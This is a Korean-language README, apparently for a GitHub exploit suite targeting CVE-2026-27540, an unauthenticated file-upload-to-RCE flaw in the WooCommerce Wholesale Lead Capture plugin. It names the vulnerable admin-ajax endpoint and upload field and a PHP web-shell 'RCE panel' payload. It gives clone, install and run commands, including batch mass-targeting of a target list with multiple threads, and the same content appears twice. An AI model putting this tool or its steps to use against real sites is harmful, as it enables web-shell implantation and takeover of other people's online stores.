WooCommerce Wholesale Lead Capture 플러그인의 인증되지 않은 파일 업로드 RCE 취약점인 CVE-2026-27540에 대한 Python 익스플로잇 제품군으로, 핑거프린팅, 배치 타겟팅, RCE 패널 페이로드를 포함합니다.
WooCommerce Wholesale Lead Capture (WWLC) — 인증되지 않은 파일 업로드 → RCE
| 제품 | WooCommerce Wholesale Lead Capture — wwlc 플러그인 |
| 버전 | ≤ 2.0.3.1 |
| Fixed | 2.0.3.2+ — 업로드 핸들러 보호됨 |
| Auth | Unauthenticated |
| 벡터 | admin-ajax.php?action=wwlc_file_upload_handler |
| 필드 | file (multipart upload) |
| 기록 위치 | WordPress uploads 디렉터리 |
| 페이로드 | payloads/x7-panel.php |
wwlc_file_upload_handler POST rate-limitgit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| 파일 | 역할 |
|---|---|
winrarzips_brand.py | CMD 배너 (by winrarzips) |
wwlc_core.py | 익스플로잇 엔진 |
CVE-2026-27540-Suite.py | 배치 + 단일 대상 CLI |
payloads/x7-panel.php | RCE 패널 |
requirements.txt | 의존성 |
❌ 대상 목록, 스캔 결과 및 패널 URL은 repo에 없습니다.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — 인증되지 않은 파일 업로드 → RCE
| 제품 | WooCommerce Wholesale Lead Capture — wwlc 플러그인 |
| 영향받는 버전 | ≤ 2.0.3.1 |
| Fixed | 2.0.3.2+ — 업로드 핸들러 강화됨 |
| Auth | Unauthenticated |
| 벡터 | admin-ajax.php?action=wwlc_file_upload_handler |
| 필드 | file (multipart upload) |
| 기록 경로 | WordPress uploads 디렉터리 |
| 페이로드 | payloads/x7-panel.php |
wwlc_file_upload_handler POST 요청 rate-limitgit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| 파일 | 역할 |
|---|---|
winrarzips_brand.py | CMD 배너 (by winrarzips) |
wwlc_core.py | 익스플로잇 코어 |
CVE-2026-27540-Suite.py | 배치 + 단일 대상 CLI |
payloads/x7-panel.php | RCE 패널 페이로드 |
requirements.txt | 의존성 |
❌ 대상 목록, 스캔 결과 및 라이브 패널 URL은 포함되지 않습니다.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed